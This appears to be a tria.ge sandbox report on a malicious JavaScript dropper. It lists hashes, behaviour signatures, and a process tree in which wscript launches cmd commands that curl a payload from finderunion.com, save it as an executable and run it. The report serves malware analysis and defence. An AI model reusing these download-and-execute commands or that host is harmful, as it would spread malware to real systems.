Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13/02/2024, 03:26

General

  • Target

    97fdebbe05a8a73c836256ae806a398f1af220dd9b384b1e2af83de19bfa7a71.js

  • Size

    37KB

  • MD5

    49573f1591b4da5b1132fe9e8b747251

  • SHA1

    ca4d9a37b2ee49d992b224cee529a9aeacba8b8d

  • SHA256

    97fdebbe05a8a73c836256ae806a398f1af220dd9b384b1e2af83de19bfa7a71

  • SHA512

    6f60b772f4da827f96bae8fb7965410fcac40d13bd10ed9c47544a4af8c47f9d767f662d6893c100dff8f001c5eff9517c4dff5ab9733dbbf11c8dae2382dcdc

  • SSDEEP

    768:t9k/pgMvHqpp1o4WnZJRNQ8Fy1+Q+X29oLhNcZbuLiA0OM4QmQ4sMwl3TQlHP9sD:LYbHVzsTVkI

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\97fdebbe05a8a73c836256ae806a398f1af220dd9b384b1e2af83de19bfa7a71.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl https://finderunion.com/CVv/0.22439561272187208.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
      2⤵
        PID:1760
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl 0.7210456677999124.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
        2⤵
          PID:1660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl 0.5858437508743046.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
          2⤵
            PID:2148
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl 0.6514301565095932.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
            2⤵
              PID:328
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl 0.10128227582407045.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
              2⤵
                PID:1972
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c mkdir C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt & curl 0.08437075093040919.dat --output C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
                2⤵
                  PID:484
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 10 & C:\Ufhhjhfjhkg\Fjykkkyfdhd\Wjkkgfdhdt\Phfjfjhgkgfjhd.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1048
                  • C:\Windows\system32\timeout.exe
                    timeout 10
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1348

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\Cab4896.tmp

                Filesize

                65KB

                MD5

                ac05d27423a85adc1622c714f2cb6184

                SHA1

                b0fe2b1abddb97837ea0195be70ab2ff14d43198

                SHA256

                c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                SHA512

                6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

              • C:\Users\Admin\AppData\Local\Temp\Tar48A9.tmp

                Filesize

                171KB

                MD5

                9c0c641c06238516f27941aa1166d427

                SHA1

                64cd549fb8cf014fcd9312aa7a5b023847b6c977

                SHA256

                4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                SHA512

                936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06